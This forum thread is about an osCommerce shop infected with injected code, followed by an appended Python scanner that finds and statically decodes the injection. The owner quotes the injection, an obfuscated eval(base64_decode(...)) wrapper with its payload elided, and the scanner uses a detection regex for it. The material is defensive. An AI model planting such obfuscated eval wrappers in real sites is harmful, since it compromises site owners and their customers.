Trojan on Website (oscommerce) Help

5 replies
Someone has placed a Trojan on my website Kitejunkiee - Kitesurfing Sunglasses, Hook Knifes & Accessories. I am ranking very well on Google page 1 for several search terms but making no sales in the last 2 weeks, and if you type kitejunkiee into Google it will show my site, but the description is all messed up.

I'm almost sure a competitor has done this. Can anyone please give me some advice to get this fixed and/or prevent this from happening again?

I host with GoDaddy.

Thanks in advance
#oscommerce #trojan #website
  • Chris Grable
    Aaron,

    The last thing I am going to do is visit your website if there is a Trojan on it... How do you know that your site has a Trojan on it? What Trojan is it? Have you changed all of your passwords? Have you backed your site up recently, and can you reinstall an older (pre-Trojan) version? If you haven't backed it up... GoDaddy probably has... will they reinstall it for you?

    They would be the first place I looked for help and support.
  • Aaron Elliott
    All my pages have this junk embedded:


    <? /**/eval(base64_decode('...'));
  • Peter Adamson
    There is a known vulnerability in osCommerce. It is often used to put up phishing pages. Be sure you don't have one. Look for unknown directories in your HTML root. Google osCommerce vulnerabilities and you will find some info and fixes.
  • Aaron Elliott
    This thing I had is popular with WordPress too, but by the looks of it WordPress has a simple script to remove it. I had to rebuild the entire site!
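
Added example, not part of the thread and not written by any of its posters: a Python scanner that walks a web root, flags files carrying the `eval(base64_decode('...'))` wrapper quoted in the thread, and statically decodes each payload to list the files it includes, which helps locate unknown files and directories like those mentioned in the replies. The function names, the extension list and the sample payload are constructed for illustration.

```python
import base64, binascii, os, re, tempfile

# Matches the wrapper shown in the thread, eval(base64_decode('...')), allowing
# whitespace inside the encoded string (forum or editor line wrapping).
INJECT_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# File paths the decoded code pulls in through include/require.
PATH_RE = re.compile(r"(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
PHP_EXT = (".php", ".phtml", ".inc", ".html", ".htm")  # assumed list, adjust per site

def decode_payload(blob):
    """Statically decode the base64 argument; the result is never executed."""
    cleaned = re.sub(r"\s+", "", blob)
    try:
        return base64.b64decode(cleaned + "=" * (-len(cleaned) % 4)).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""

def scan_file(path):
    """Return one finding per injected block: decoded size and referenced paths."""
    with open(path, "r", encoding="latin-1") as fh:
        text = fh.read()
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = decode_payload(m.group(2))
        findings.append({"file": path, "decoded_len": len(decoded),
                         "includes": sorted(set(PATH_RE.findall(decoded)))})
    return findings

def scan_tree(root):
    """Walk a web root and collect findings from every PHP/HTML-like file."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                results.extend(scan_file(os.path.join(dirpath, name)))
    return results

def demo():
    """Constructed sample: a harmless stand-in payload, not the one from the thread."""
    inner = "if(1){include_once('/constructed/path/extra.php');}"
    b64 = base64.b64encode(inner.encode()).decode()
    spaced = " ".join(b64[i:i + 20] for i in range(0, len(b64), 20))
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<? /**/eval(base64_decode('%s')); ?>\n<html></html>\n" % spaced)
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        return [(os.path.basename(f["file"]), f["includes"]) for f in scan_tree(root)]
```

Run `scan_tree()` against a copy of the site files; every path listed under `includes` is a file to inspect and compare against a known-clean osCommerce install.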